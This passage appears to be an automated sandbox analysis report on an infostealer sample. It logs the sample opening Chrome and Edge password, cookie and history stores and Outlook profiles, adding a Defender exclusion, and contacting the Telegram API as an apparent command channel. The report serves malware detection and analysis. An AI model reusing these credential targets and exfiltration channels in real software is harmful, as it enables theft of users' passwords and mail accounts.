                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Users\user\Desktop\3GrfjMY0pG.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000005.00000002.3611341231.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.3GrfjMY0pG.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4f303b8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3608797438.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1194579407.0000000004BEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6092, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                23
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSH11
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
                Virtualization/Sandbox Evasion
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632224 Sample: 3GrfjMY0pG.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 2 other IPs or domains 2->31 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 57 13 other signatures 2->57 8 3GrfjMY0pG.exe 4 2->8         started        12 svchost.exe 1 1 2->12         started        signatures3 53 Tries to detect the country of the analysis system (by using the IP) 27->53 55 Uses the Telegram API (likely for C&C communication) 29->55 process4 dnsIp5 25 C:\Users\user\AppData\...\3GrfjMY0pG.exe.log, ASCII 8->25 dropped 59 Adds a directory exclusion to Windows Defender 8->59 15 3GrfjMY0pG.exe 15 2 8->15         started        19 powershell.exe 23 8->19         started        33 127.0.0.1 unknown unknown 12->33 file6 signatures7 process8 dnsIp9 35 api.telegram.org 149.154.167.220, 443, 49721 TELEGRAMRU United Kingdom 15->35 37 checkip.dyndns.com 193.122.6.168, 49699, 49706, 49709 ORACLE-BMC-31898US United States 15->37 39 reallyfreegeoip.org 104.21.96.1, 443, 49700, 49704 CLOUDFLARENETUS United States 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 45 Loading BitLocker PowerShell Module 19->45 21 WmiPrvSE.exe 19->21         started        23 conhost.exe 19->23         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.